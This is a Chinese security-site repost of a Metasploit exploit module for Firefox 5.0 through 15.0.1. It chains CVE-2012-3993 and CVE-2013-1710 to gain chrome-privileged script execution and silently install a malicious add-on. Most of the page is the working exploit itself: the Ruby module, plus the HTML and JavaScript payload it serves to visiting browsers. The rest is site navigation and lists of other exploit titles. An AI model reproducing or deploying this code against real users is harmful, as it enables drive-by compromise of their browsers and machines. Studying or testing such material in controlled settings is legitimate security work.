首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Firefox 15.0.1 Code Execution
来源:metasploit.com 作者:joev 发布时间:2013-12-24  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::FirefoxAddonGenerator

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
      'Description'    => %q{
        On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
        invalid input, would throw an exception that did not have an __exposedProps__
        property set. By re-setting this property on the exception object's prototype,
        the chrome-based defineProperty method is made available.

        With the defineProperty method, functions belonging to window and document can be
        overriden with a function that gets called from chrome-privileged context. From here,
        another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
        into the context's private scope. Since the window does not have a chrome:// URL,
        the insecure parts of Components.classes are not available, so instead the AddonManager
        API is invoked to silently install a malicious plugin.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'Mariusz Mlynski', # discovered CVE-2012-3993
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'joev' # metasploit module
      ],
      'DisclosureDate' => "Aug 6 2013",
      'References' => [
        ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff<15)
        ['OSVDB', '86111'],
        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
        ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff<23)
        ['OSVDB', '96019']
      ],
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(5, 15) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    if request.uri.match(/\.xpi$/i)
      print_status("Sending the malicious addon")
      send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
    else
      print_status("Sending HTML")
      send_response_html(cli, generate_html(target_info))
    end
  end

  def generate_html(target_info)
    injection = if target_info[:ua_ver].to_i == 15
      "Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
    else
      "p2.constructor.defineProperty(obj,key,{get:runme});"
    end

    %Q|
      <html>
      <body>
      #{datastore['CONTENT']}
      <div id='payload' style='display:none'>
      if (!window.done){
        window.AddonManager.getInstallForURL(
          '#{get_module_uri}/addon.xpi',
          function(install) { install.install() },
          'application/x-xpinstall'
        );
        window.done = true;
      }
      </div>
      <script>
      try{InstallTrigger.install(0)}catch(e){p=e;};
      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
      p2.__exposedProps__={
        constructor:'rw',
        prototype:'rw',
        defineProperty:'rw',
        __exposedProps__:'rw'
      };
      var s = document.querySelector('#payload').innerHTML;
      var q = false;
      var register = function(obj,key) {
        var runme = function(){
          if (q) return;
          q = true;
          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
        };
        try {
          #{injection}
        } catch (e) {}
      };
      for (var i in window) register(window, i);
      for (var i in document) register(document, i);
      </script>
      </body>
      </html>
    |
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy Karaokay Player 3.3.31 (.
·HP SiteScope issueSiebelCmd Re
·Internet Download Manager 6.17
·Zimbra Collaboration Server LF
·RealPlayer Heap-based Buffer O
·OpenSIS 'modname' PHP Code Exe
·Traidnt Upload 3 Add Administr
·Synology DiskStation Manager S
·MS13-101 Windows Kernel win32k
·Red Hat CloudForms Management
·QuickHeal AntiVirus 7.0.0.1 -
·Easy Karaoke Player 3.3.31 Int
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved